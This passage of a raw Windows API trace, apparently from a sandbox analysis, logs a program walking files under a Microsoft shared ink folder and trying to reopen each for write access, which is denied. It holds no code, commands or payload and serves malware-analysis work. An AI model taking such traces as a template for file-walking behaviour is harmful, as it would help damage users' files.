dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0083.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0083.940] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.940] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.940] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xb0, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x80a38, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xb0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓Μ")) returned 0 [0083.940] FindClose (in: hFindFile=0x78710 | out: hFindFile=0x78710) returned 1 [0083.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0083.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0083.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0083.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.941] AreFileApisANSI () returned 1 [0083.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml", lpUsedDefaultChar=0x0) returned 77 [0083.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0083.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.942] AreFileApisANSI () returned 1 [0083.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0083.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0083.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml") returned 77 [0083.942] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.942] GetFileType (hFile=0x42c) returned 0x1 [0083.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.942] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.942] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.943] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.943] CloseHandle (hObject=0x42c) returned 1 [0083.943] AreFileApisANSI () returned 1 [0083.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0083.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0083.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml") returned 77 [0083.943] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.943] GetLastError () returned 0x5 [0083.943] GetLastError () returned 0x5 [0083.943] SetLastError (dwErrCode=0x5) [0083.943] GetLastError () returned 0x5 [0083.943] SetLastError (dwErrCode=0x5) [0083.943] GetLastError () returned 0x5 [0083.943] SetLastError (dwErrCode=0x5) [0083.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0083.943] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.943] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.944] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf371, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="symbols", cAlternateFileName="")) returned 1 [0083.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0083.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0083.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.944] AreFileApisANSI () returned 1 [0083.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols", lpUsedDefaultChar=0x0) returned 73 [0083.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0083.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.944] AreFileApisANSI () returned 1 [0083.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0083.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols") returned 73 [0083.945] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.945] GetLastError () returned 0x5 [0083.945] GetLastError () returned 0x5 [0083.945] SetLastError (dwErrCode=0x5) [0083.945] GetLastError () returned 0x5 [0083.945] SetLastError (dwErrCode=0x5) [0083.945] GetLastError () returned 0x5 [0083.945] SetLastError (dwErrCode=0x5) [0083.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0083.945] AreFileApisANSI () returned 1 [0083.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0083.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols") returned 73 [0083.945] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.945] GetLastError () returned 0x5 [0083.946] GetLastError () returned 0x5 [0083.946] SetLastError (dwErrCode=0x5) [0083.946] GetLastError () returned 0x5 [0083.946] SetLastError (dwErrCode=0x5) [0083.946] GetLastError () returned 0x5 [0083.946] SetLastError (dwErrCode=0x5) [0083.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0083.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0083.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0083.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0083.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.946] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0083.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0083.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0083.947] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x784d0 [0083.947] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf371, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.947] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea-sym.xml", cAlternateFileName="")) returned 1 [0083.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x51398 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0083.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0083.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.948] AreFileApisANSI () returned 1 [0083.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpUsedDefaultChar=0x0) returned 84 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0083.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0083.949] AreFileApisANSI () returned 1 [0083.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0083.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 